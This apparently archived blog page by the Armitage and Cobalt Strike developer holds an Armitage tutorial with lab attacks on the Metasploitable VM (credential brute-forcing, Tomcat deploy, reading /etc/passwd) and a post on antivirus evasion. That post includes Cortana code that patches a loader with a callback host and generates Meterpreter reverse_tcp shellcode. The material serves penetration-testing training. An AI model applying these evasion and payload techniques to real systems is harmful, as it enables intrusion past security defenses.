Armitage Archives - Page 2 of 2 - Cobalt Strike Research and Development

Getting Started with Armitage and the Metasploit Framework (2013)

So, I just realized there isn’t a modern tutorial on how to start Armitage and take advantage of it. There’s the documentation, but my documentation tries to cover every corner case and it’s not friendly to the novice who wants to try it out quickly. I do not know of a getting started guide that is up to date with the latest Armitage conventions. This blog post is my attempt to correct this oversight.


22 May 2013 – I’ve updated this tutorial to state how to use Armitage with Kali Linux, since BackTrack Linux is no longer supported.

22 Sept 2013 – Added instructions to make Kali Linux use Java 1.7 by default. The Java 1.6 shipped with Kali causes graphical glitches.

16 April 2014 – This blog post is still good advice. If you’re looking to get started with Armitage, you’re reading the most modern and complete guide.

What is Armitage?

Armitage is a graphical user interface for the Metasploit Framework. At first glance, it may seem that Armitage is just a pretty front-end on top of Metasploit. That’s not quite true. Armitage is a scriptable red team collaboration tool. It has a server component to allow a team of hackers to share their accesses to compromised hosts.

It’s also possible to write bots that connect to this team server and extend Armitage with scripts written in a language called Cortana. This Cortana piece was funded by DARPA’s Cyber Fast Track program. There’s a lot here.

Armitage (Fast and Easy Hacking)

Multi-Player Metasploit with Armitage

If you aren’t familiar with the Metasploit Project, it’s an open source collection of safe and vetted exploits. Once an exploit makes it into the Metasploit Framework, it’s immediately available to its ~250K users. The Metasploit Framework isn’t just exploits though, it’s an integration point for offensive capabilities that simply work together. It’s also very easy to hook your own stuff into it.

There are several programs that build on the Metasploit Framework and take advantage of it. For example, Rapid7, the company that employs Metasploit’s founder and its core team, has a line of penetration testing products built on the framework. The subject of this tutorial is the open source Armitage GUI, which I wrote. I also develop Cobalt Strike, which adds threat emulation tools to Armitage.

If you work in security or have an interest in it, you owe it to yourself to spend some time learning about Armitage and the Metasploit Framework and how to use them.

Let’s dive in.

Starting Kali Linux

The best way to start playing with Armitage is to download Kali Linux and run it in a virtual machine. For this guide, you should set your virtual machine to NAT networking. This is necessary because in a moment, I will ask you to download a target virtual machine and set it up.

To login to Kali Linux, use the username root, password toor. To request an IP address via DHCP, type dhclient. To start X Windows, type startx.

Use Java 1.7

Kali Linux ships with Java 1.6 and Java 1.7. Java 1.6 is the default though and for some people–this version of Java makes their menus stick or draw slowly. For the best Armitage experience, you should use Java 1.7. Fortunately, it’s one command to change the default.

If you have 32-bit Kali Linux, open a terminal and type:

update-java-alternatives --jre -s java-1.7.0-openjdk-i386

If you have 64-bit Kali Linux, open a terminal and type:

update-java-alternatives --jre -s java-1.7.0-openjdk-amd64

Installing Armitage

Your version of Kali Linux may not include Armitage. To install it, type:

apt-get install armitage

Next, you need to start the Metasploit service. Armitage does not use the Metasploit service, but starting it once will setup a database.yml file for your system. This is a necessary step. You only need to do this once:

service metasploit start
service metasploit stop

Updating the Metasploit Framework

Use the msfupdate command to update the Metasploit Framework to the latest. Armitage is included with the Metasploit Framework, so it will update too (not any more).

Starting Armitage

Before you can use Armitage, you must start the postgresql database. This does not happen on boot, so you must run this command each time you restart Kali:

service postgresql start

To start Armitage in Kali Linux, open a terminal and type:


Armitage will immediately pop up a dialog and ask where you would like to connect to. These parameters only matter if you want to connect to an Armitage team server. Since we’re getting started, we don’t care.  Just press Connect.

armitage connect

Next, Armitage will try to connect to the Metasploit Framework. Big surprise, the Metasploit Framework is not running. Armitage will realize this and it will ask you if you would like it to start Metasploit for you. The correct answer is Yes. Press this button and wait.


You will see connection refused messages for up to a few minutes. If this is your first time starting the Metasploit Framework, this may take literally a few minutes. The Metasploit Framework is the largest Ruby codebase out there and it takes time to load all of its modules for the first time. Be patient.

If all went well, you will see a GUI that looks like this:


You’re now ready to use Armitage.

A Target

Every attacker needs a target. Since you’re just starting out, I recommend that you set up a target virtual machine made for learning the Metasploit Framework. If you need such a target virtual machine, look no further than Metasploitable 2.

Metasploitable 2 is a virtual machine maintained by the Metasploit project team. It’s an Ubuntu server with a lot of services and vulnerabilities.

You can download Metasploitable 2 at:

Set this virtual machine up. Make sure you set the networking for this virtual machine to NAT or host-only. You do not want to expose this virtual machine to the internet.

To learn its IP address, login as user msfadmin, password msfadmin when this virtual machine starts up. Type ifconfig to see the network configuration for this virtual machine. Once you have an IP address for this system, you’re now to ready to attack it.

Now, go RTFM

The Metasploit Framework has a lot of jargon and Armitage has a lot of conventions associated with it. Now that you’re up and running, I recommend that you take a few minutes and read the Armitage manual. You can skip the Getting Started portion if you like. Pay special attention to section 1.4 which details some of the vocabulary around the Metasploit Framework. I also recommend that you read the User Interface Tour, Exploitation, and Post Exploitation chapters.

The Armitage manual is not a tutorial, but it will help orient you around the tool. You want this orientation, because in the next part of this guide, you will attack the Metasploitable Virtual Machine that you setup a moment ago.

Armitage Labs

I spend a lot of time teaching folks how to use Armitage and its big brother Cobalt Strike. To start out right, I have my students go through several labs designed to help them experience the conventions in the Metasploit Framework first hand. Work through these labs and you will start to develop a mental model of what the Metasploit Framework can do and how it’s organized.


  1. Go to Hosts -> Nmap Scan -> Intense Scan, all TCP ports
  2. Type the IP address of the Metasploitable Virtual Machine
    Wait for the scan to complete. It will take some time.
  3. Right-click the Metasploitable host and select Services


  1. Go to Attacks -> Find Attacks
  2. Wait for Attack Analysis complete dialog.
  3. Right-click the Metasploitable host and try various items from the Attack menu until one works. Something is bound to  work.Right-click the Metasploitable host and select Shell 1 -> Interact. If you have a Meterpreter 1 menu, then keep searching. Meterpreter is a great post-exploitation tool, but we’re not ready to talk about it yet. Find an exploit that yields a shell.
  4. Type: whoami and press enter in the new Shell 1 tab.

Brute Force VNC

  1. Select the Metasploitable host in the target area
  2. Navigate to auxiliary -> scanner -> vnc -> vnc_login in the module browser. Double-click this module.
  3. Press Launch
  4. Open a Terminal and type: vncviewer metasploitable IP:5900.  Use the password vnc_login helped you discover to connect.

Tomcat Manager Deploy Exploit

  1. Select the Metasploitable host in the target area
  2. Navigate to auxiliary-> scanner -> http -> tomcat_mgr_login in the module browser. Double-click this module.
  3. Double-click the RPORT value and change it to the correct port. Take a look at the services on the system. Which port is running Apache Tomcat?
  4. Press Launch
  5. Navigate to exploit -> multi -> http -> tomcat_mgr_deploy in the module browser. Double-click this module
  6. Change RPORT, USERNAME, and PASSWORD to their correct values. Step 4 should have yielded a valid username and password for you.
  7. Press Launch

Brute Force

Metasploit modules ending with _login are usually able to brute force credentials. Try mapping one of the open services to its login module and follow these steps:

  1. Type _login in the search box below the module browser
  2. Launch the *_login module you’re interested in. Type _login in the box below the module browser to search for these modules
  3. Find the USER_FILE option and double-click the black square. The black square indicates that there is a helper dialog to set this option
  4. Double-click on the wordlists folder
  5. Choose the unix_users.txt file
  6. Set the PASSWORD option to something silly, such as password. Or, set PASS_FILE to a juicy looking file (but then expect this to take a long time)
  7. Press LaunchHow many weak accounts did you find?

Postgres Ownership

Not all vulnerabilities will yield a shell. That’s OK. Sometimes there are other great opportunities:

  1. Try to brute force credentials to the postgres database running on the system
  2. Use the results of step 1 to read the contents of /etc/passwd through the postgres database. Hint: search for any postgres related modules. There may be one that can help you.

Where to go from here?

If you made it this far, you’ve started Armitage, started a target, and had a chance to experience these tools first hand. If you’d like to learn more about Armitage, I recommend that you watch the free Armitage and Metasploit Training Course at

If you’re interested in a deep dive on the Metasploit Framework, the standard reference is the Metasploit Unleashed Course. If you’d like a book, read Metasploit: The Penetration Tester’s Guide, and if you like videos, I recommend Vivek’s Security Tube Metasploit Framework Expert Series.

If you’re a professional penetration tester and Armitage piques your interest, I would also like to point you towards Cobalt Strike. Cobalt Strike is a toolset for red team operations and adversary simulations. Cobalt Strike’s 3.0 release no longer depends on the Metasploit Framework. It’s a stand-alone toolset, separate from Armitage. Use Cobalt Strike in situations where you need to work as an external actor and stealth matters a great deal.



Interested in Trying Cobalt Strike?


Armitage – Host Labels for Better Team Pen Testing

One of the things I offer is the Advanced Threat Tactics with Cobalt Strike course. The best part of this course is the end exercise. I split students up into teams, give them goals, and watch them apply what they learned to get a foothold in a network, spread from that point, and sift through data. This class is a great source of feedback for me.

Last time I taught, several students asked for the ability to label hosts. They simply wanted to say “this is a mail server”, “this is a domain controller”, etc. in a way that all their teammates could digest.

I’ve had similar suggestions in the past, but having a dialog allowed me to turn the suggestion into something actionable pretty quickly.

Today’s Armitage update adds host labels. A host label is a small user-defined note attached to a host. Right-click a host, go to Host -> Set Label to set it. All team members will see the same labels and anyone can update a host’s label.

The graph view displays the label underneath the host. The table view has a column for labels now.

You can filter your host display by labels too. Armitage has had the concept of dynamic workspaces since November 2011. Dynamic workspaces are filters, defined by you, based on network, operating system, open services, etc.. You can switch workspaces through a menu or go Starcraft style and use Ctrl+1 … Ctrl+n to activate your workspaces.

Labels are now a dynamic workspace criteria too. Each word in a label is a searchable tag that you may use in your workspace definitions.

This open-ended feature gives you a way to assign actions, group hosts, and share small notes during a team penetration test. It’s a nice addition to Armitage’s existing real-time event log, data sharing, and session sharing features for teams.

Get the latest Armitage at or use msfupdate to grab it.

Two Years of Fast and Easy Hacking

Today marks the two-year anniversary of the release of Armitage. My goal was to create a collaboration tool for exercise red teams. I wanted to show up to North East CCDC with a new toy. I had no idea Armitage would lead to so many new friends and new adventures.

In the past two years, Armitage has had 55 releases and over 900 commits to the repository on Google Code. Today, Armitage is 11,721 lines of Java code and 10,155 lines of Sleep code.

Armitage has appeared on a Fox sitcom (thanks Erik!), in many articles, on the cover of two magazines, in the pages of multiple books, in classrooms all over the world, and it has had its share of press. Armitage’s scripting technology Cortana, was funded by DARPA’s Cyber Fast Track program.

Early Armitage with the 3-Panel Interface

Armitage is quite the ride. I have not seen this type of response to my other projects. As Armitage hits maturity, I ask: how do I innovate without creating bloat or damaging Armitage’s core use case?

My answer is to keep Armitage focused on its core capability: sharing the Metasploit Framework. Cortana is a natural progression of this work. It allows you to share the Metasploit Framework with bots. Next? I’m keen to link multiple instances of the Metasploit Framework and share them in an intuitive way.

armitage first screenshot

Armitage’s Oldest Screenshot

My North East CCDC red team experiences led to Armitage. In the CCDC red team environment, the lack of collaboration was a big pain. Armitage was my crack at this problem.

Armitage’s big brother, Cobalt Strike, has a similar story. I used to provide red team services to a DoD customer. From this work, I have a wish list of capabilities and an appreciation for the process that ties them together.

Cobalt Strike is a system to penetrate networks the way real attackers do. I use Armitage and the Metasploit Framework as an integration point for the tools on my wish list.

I’m working through this wish list, one capability at a time. Here’s what I’ve got, so far: To get a foothold, Cobalt Strike offers a workflow for web drive-by and spear phishing attacks. To quietly hold access, you get Beacon, a post-exploitation agent that uses DNS to check for tasks. To use your foothold, Covert VPN bridges you into the target’s network. Of course, Cobalt Strike generates MS Word and PDF reports too.

This work is fun. Armitage is a vehicle to experiment with collaboration, automation, and scale. Cobalt Strike is my way to help penetration testing become threat emulation again.

I really had no idea that two years would lead to this. What a crazy ride!

Using AV-safe Executables with Cortana

Part of a penetration tester’s job is to deal with security products, such as anti-virus. Those of us that use the open source Metasploit Framework know that AV vendors have given the framework more attention in the past year. Now, exotic templates and multiple iterations through the framework’s encoders are not always enough to defeat the products we face in the field.

In this blog post, I’ll walk you through a quick survey of ways to create an executable that defeats anti-virus. I will then show you how you may use Cortana to automatically use one of these techniques with Armitage and Cobalt Strike’s workflow.

Create an AV-safe Executable

Defeating anti-virus is an arms race. A common way to defeat anti-virus is to create a new executable, obfuscate your shellcode, stuff it into the executable, have the executable decode the shellcode at runtime, and execute it. These types of executables are very easy to write. To defeat this simple trick, some anti-virus products emulate binaries in a sandbox hoping to detect something that matches a known bad pattern in a short amount of time. The game then becomes, how do we create something anti-virus products haven’t seen or fool this sandbox emulation so the AV product doesn’t ever see our shellcode in a decoded state.

One option to turn our shellcode into something anti-virus products haven’t seen is Assembly Ghost Writing (HOWTO, original paper). Simply disassemble your shellcode, add junk calls and branches, and assemble into a new executable. Clever developers can automate this process too. Unfortunately, heuristics in some anti-virus products may catch on to your plan.

Hyperion (HOWTOoriginal paper) is a novel solution to get past the sandbox. Hyperion creates an executable with an AES encrypted version of your shellcode. To defeat sandbox emulation, the executable brute forces the AES key (it’s a small key) to decode your shellcode. This works well until AV vendors start writing rules to detect the AES brute force stub in the generated executable. According to the material on Hyperion’s site, Hyperion will try to mitigate some of this by using techniques like Assembly Ghostwriting to obfuscate its stub.

Another option is to buy a code-signing certificate and sign your executable. Some anti-virus products give a free pass to signed executables.

There are many ways to create an executable that passes anti-virus. No one technique is a silver bullet to defeat all products into perpetuity though. Part of our job as penetration testers is to figure out which technique makes sense for our engagement.

Why are AV-safe executables important?

Access to an anti-virus safe executable is important for the maneuver phase of an engagement. Metasploit Framework modules such as psexec and current_user_psexec rely on a Metasploit Framework generated executable by default. If you use this default executable, anti-virus will catch you.

If you have your own executable, you can use it through Armitage or Cobalt Strike. Navigate to the psexec module, go to advanced options, and define EXE::Custom to your executable. If you’d like the framework to always use your executable, then open a console and type: setg EXE::Custom /path/to/yourexecutable.exe.

EXE::Custom is a great point to hook into the framework. It does add some work though. You have to keep track of the executables you generate and which payload handler they map to. If you forget to create a handler (or misconfigure it), then your attack won’t work. *cough*This is a big problem for me*cough*.

Use your AV-safe Executable with Cortana

Wouldn’t it be nice if you could plug your favorite anti-virus bypass technique into the workflow of Armitage and Cobalt Strike? Well, thanks to Cortana, you can.

Cortana filters let you intercept user actions and change them before they’re passed to the Metasploit Framework. With the user_launch filter, we can define a filter that notices a psexec or current_user_psexec  module launch, and set the EXE::Custom to our custom executable every time.

This Cortana script will intercept the psexec and current_user_psexec modules, patch an AV-safe executable using the parameters the user launched the module with, and set EXE::Custom appropriately.

# a cortana filter, fired when a user launches a module
filter user_launch {

# is the user launching psexec of some sort? I want in <img draggable="false" role="img" class="emoji" alt="????" src="">
if ($2 eq "windows/smb/psexec" || $2 eq "windows/local/current_user_psexec") {
# has the user define a custom payload already? bail if they have.
if ($3['EXE::Custom'] ne "") {
return @_;

# this AV bypass demo is windows/meterpreter/reverse_tcp only...
if ($3['PAYLOAD'] ne "windows/meterpreter/reverse_tcp") {
println("[-] $2 / $3 is using an incompatible payload... doing nothing");
return @_;

# patch loader.exe with our host and port
$custom_exe = patch_loader_exe($3['LPORT']);

# upload the custom file to the team server (if there is one), store its path
$custom_exe = file_put($custom_exe);

# update the payload options to use our new executable
$3['EXE::Custom'] = $custom_exe;

# change the wait for session delay to a higher value
$3['WfsDelay']    = 60;

# return our original arguments. Changes to $3 will affect this array.
return @_;

In this example, I’m using the Meterpreter stage-1 I wrote awhile back as an AV-bypass executable. I wrote this stage-1 not to bypass AV, but as an example of how to stage Meterpreter from a C program. At the time, few anti-virus programs picked it up though. So it’ll work for our purposes. Here’s the code to modify this executable on the fly:

sub patch_loader_exe {
local('$patch $handle $data $tempf');

# ok, let's create a patch for loader.exe with the desired host/port.
$patch = pack("Z20 I-", lhost(), $1);

# read in loader.exe
$handle = openf(script_resource("loader.exe"));
$data = readb($handle, -1);

# patch it.
$data = strrep($data, "A" x 24, $patch);

# write out a temporary file.
$tempf = ticks() . ".exe";
$handle = openf("> $+ $tempf");
writeb($handle, $data);

# delete our temp file when this app closes

return $tempf;

The entire package is on Github if you’d like to try it out. You can use this snippet in Armitage or Cobalt Strike.

If you’d like to use another AV-bypass solution (beyond my simple loader from a few weeks ago), you will need the ability to generate shellcode from Cortana. Here’s the long way to do it:

local('$options $shellcode');
$options = %(
LHOST      => lhost(),
LPORT      => 4444,
PAYLOAD    => "windows/meterpreter/reverse_tcp"),
EXITFUNC   => "process",
Encoder    => "generic/none",
Iterations => 0);

$shellcode = call("module.execute", "payload", $options['PAYLOAD'], $options)['payload'];

And the easy way (use Cortana’s &generate function):

$shellcode = generate("windows/meterpreter/reverse_tcp", lhost(), 4444, %(), "raw");

Armitage and Cobalt Strike both give you a workflow for your penetration testing purposes. Cortana gives you full control of this workflow. You’re empowered you to use the right solution for your situation.

Pssst: For licensed Cobalt Strike users, I’ve made a similar script available. The Cobalt Strike version of this script intercepts the psexec and current_user_psexec modules, generates shellcode for the desired listener, encodes the shellcode, and places this encoded shellcode into an executable. The executable, source code, and script are available by going to Help -> Arsenal in today’s Cobalt Strike update.

Cobalt Strike and Armitage Updates

Updates to Cobalt Strike and Armitage are available now. I spent the past two weeks testing these programs through unit tests, a class QA focus group, and multiple penetration tests of my local lab from Amazon’s EC2.

This update fixes several bugs in both programs and I was even able to contribute a few fixes to the Metasploit Framework.

As usual, the trial version of Cobalt Strike is available at: (changelog)

Use msfupdate to get your hands on the updated Armitage release, or go to: (changelog)

For either application, I recommend that you update the Metasploit Framework to get revision 15972. A CPU resource starvation condition was mitigated last night. This bug would cause a Ruby thread to take over the CPU for up to 10 minutes at a time, making Armitage and Cobalt Strike barely usable. I have a blog post coming on this particular bug.

P.S. Strategic Cyber (*cough*me*cough*) is at the Maryland Cyber Challenge and Conference today and tomorrow. Stop by our table to get one of the nifty penetration testing lab DVDs with exercises and target VMs paired to our online course.

Dirty Red Team Tricks II at Derbycon 2.0

Last year, I spoke on Dirty Red Team Tricks at Derbycon. This talk was a chance to share what I had used at the Collegiate Cyber Defense Competition events to go after student networks. During this talk, I emphasized red team collaboration and our use of scripts to automatically own Windows and UNIX systems. I also released the auto hack scripts at the event.

This year, I had a chance to update this talk and show what is different about this year. At this talk, I emphasized the use of bots and how they helped us play the game. I also talked about the use of asynchronous command and control to better hide our presence on student systems. I released Raven, the asynchronous C2 agent I developed for this year’s CCDC event. Raven is the prototype of Cobalt Strike’s Beacon feature. I also released a few other Cortana scripts discussed in the talk. This talk also covers a neat Windows persistence trick using DLL hijacking against explorer.exe.

Thanks to Adrian “irongeek” Crenshaw‘s amazing speed, I’m able to share both videos with you today. It’s best to watch both videos in order.

Let me know what I should cover in next year’s Dirty Red Team Tricks III.

Cortana: Rise of the Automated Red Team (DEFCON 20 Video)

At DEFCON 20, I released Cortana, a scripting technology for Armitage and Cobalt Strike. This is the talk I gave after losing my voice.

Here’s the actual DEFCON talk:

If you’d like to get started with Cortana, Jason Frank has a great blog post showing how to load and use scripts.

A public collection of scripts is available on Github. To download the latest version of these scripts, type:

git clone

If you’d like to write your own scripts, consult the tutorial to get started.

Cortana: real-time collaborative hacking… with bots

At BSides Las Vegas, I talked about Force Multipliers for Red Team Operations. In this talk, I shared several stories about how my evil bots stole passwords, instantly installed back doors, and generally wreaked havoc on college students defending (sometimes) unpatched systems. Today, I’d like to introduce you to the technology behind this havoc: Cortana.

You may know Armitage: a red team collaboration tool built on the Metasploit Framework. Cobalt Strike is Armitage’s commercial big brother. Both packages include a team server. Through this team server, multiple hackers may control compromised hosts and launch attacks through one instance of the Metasploit Framework.

Inspired by my days on IRC in the 1990s, I wondered what would happen if I added bots to this collaborative hacking setup. This wondering (and a DARPA contract) led to Cortana, a scripting language for Armitage and Cobalt Strike.

Cortana Architecture

What can I do?

Using Cortana, you may develop stand-alone bots that join your red team. Cortana bots scan hosts, launch exploits, and work on compromised hosts without stepping on each other or getting in the way of their human teammates. Think of this system as Google Wave Apache Wave for hacking.

Cortana scripts may also extend the Armitage and Cobalt Strike clients with new features. Cortana scripts can expose hidden Metasploit features, integrate third-party tools and agents, or control other Cortana bots.

Start Here…

If you’ve ever written scripts for an IRC client such as mIRC, irssi, BitchX, or even jIRCii–you’ll find yourself right at home with Cortana. The best place to start is the Cortana Tutorial. This document is a 55-page tutorial, reference, and collection of examples.

If you’d like to get involved writing Cortana scripts, head over to the Cortana Scripts Github repository. Fork the repository and start hacking away. Several example scripts are available, right now, for your copying and pasting pleasure.

Developer Support

If you have questions, join the Cortana Hackers Mailing list. Send a blank message to [email protected] and you will be subscribed. You may send a message to [email protected] to unsubscribe from the list.

If you’d like to connect on IRC with other Cortana hackers, join #armitage on

Get It

Cortana is now available in Armitage 08.02.12 shipped in the Metasploit Framework. Type msfupdate and you have it. I hope I didn’t freak anyone out with my mega-large pull request.

The latest trial of Cobalt Strike has it too.

Cortana is BSD-licensed and is co-developed with Armitage. This work was made possible by a DARPA Cyber Fast Track contract.

I first announced Cortana at DEFCON 20. The slides from this presentation are available as well.

Use Armitage and Cobalt Strike on Amazon’s EC2

James Webb has an interesting blog post on how to use Armitage to manage a pen test through Amazon’s Elastic Computing Cloud.

He does a good job articulating the benefits which include using Amazon’s EC2 to test your security from an outside in perspective or using it as a central point for a distributed red team to work from.

He also explains how to obtain authorization for penetration testing activities from Amazon. They do have a process for this and they’re very good about responding to these requests.

You can use Cobalt Strike or Armitage to work with Amazon’s EC2. If you use Cobalt Strike, I recommend using the quick-msf-setup script included with Cobalt Strike to quickly setup your environment. This process is described in the Cobalt Strike Linux Installation Instructions.

Also, when you run the teamserver, make sure you specify the external IP address of the EC2 node and not the private address bound to the network interface on the system. By specifying an external IP address, you’re telling the Metasploit Framework where it should send reverse connections to by default. It’s really important that this IP address is something your target systems can talk to.